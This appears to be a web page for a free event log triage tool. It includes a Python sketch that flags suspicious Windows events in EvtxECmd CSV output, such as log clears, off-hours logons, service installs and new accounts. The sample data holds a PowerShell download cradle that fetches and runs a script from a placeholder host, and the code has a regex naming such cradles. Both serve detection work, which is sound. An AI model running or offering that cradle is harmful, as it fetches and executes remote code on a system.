Free Interactive Tool
Event Log Triage Analyzer
Paste your EvtxECmd CSV output and instantly see the suspicious events, with the reasoning a responder applies: log clears, off-hours logons, service installs, account creation, PowerShell download cradles, and more. Runs entirely in your browser. Nothing is uploaded.
Export Windows event logs with EvtxECmd, paste the CSV below, and the analyzer flags the high-signal events and explains why each matters and what to check next. No event logs of your own? Load the built-in sample incident, a compromised workstation, and watch the attack story assemble itself.
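The kind of rule-based triage described above can be sketched in a few lines. This is an added example, not the analyzer's own code: the column subset, the 08:00 to 18:00 weekday business-hours window (applied to the timestamps as exported), and the cradle regex are assumptions, and the sample rows are constructed.

```python
import csv
import io
import re
from datetime import datetime

# Constructed sample rows using a subset of EvtxECmd CSV columns (not real data).
SAMPLE = r"""TimeCreated,EventId,Channel,Computer,UserName,PayloadData1,Payload
2024-03-12 14:05:11.0000000,4624,Security,WS01,CORP\alice,LogonType 2,
2024-03-13 02:14:07.0000000,4624,Security,WS01,CORP\svc_backup,LogonType 10,
2024-03-13 02:16:40.0000000,4104,Microsoft-Windows-PowerShell/Operational,WS01,,ScriptBlockText,IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')
2024-03-13 02:18:02.0000000,7045,System,WS01,,Name: UpdaterSvc,
2024-03-13 02:19:30.0000000,4720,Security,WS01,CORP\svc_backup,Target: helpdesk2,
2024-03-13 09:12:00.0000000,4104,Microsoft-Windows-PowerShell/Operational,WS02,,ScriptBlockText,Get-ChildItem C:\Users
2024-03-13 02:25:55.0000000,1102,Security,WS01,CORP\svc_backup,,
"""

# Channel + Event ID pairs that are high-signal on their own.
RULES = {
    ("Security", 1102): "Security audit log cleared",
    ("System", 104): "Event log cleared",
    ("System", 7045): "New service installed",
    ("Security", 4720): "User account created",
}
# Assumed indicators of a download cradle in PowerShell script block text.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b", re.I)
BUSINESS_HOURS = range(8, 18)  # assumption: 08:00-17:59, Monday to Friday

def triage(csv_text):
    """Return (time, event_id, computer, reason) tuples in chronological order."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        eid = int(row["EventId"])
        chan = row["Channel"]
        when = datetime.strptime(row["TimeCreated"][:19], "%Y-%m-%d %H:%M:%S")
        text = " ".join(v for k, v in row.items() if k and k.startswith("Payload") and v)
        reason = RULES.get((chan, eid))
        if reason is None and (chan, eid) == ("Security", 4624):
            if when.weekday() >= 5 or when.hour not in BUSINESS_HOURS:
                reason = "Logon outside business hours"
        if reason is None and eid == 4104 and CRADLE.search(text):
            reason = "PowerShell download cradle in script block"
        if reason:
            findings.append((row["TimeCreated"][:19], eid, row["Computer"], reason))
    return sorted(findings)

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(*finding, sep=" | ")
```

Sorting the findings by time is what turns isolated hits into a sequence a responder can read: off-hours logon, script execution, service install, account creation, then log clear.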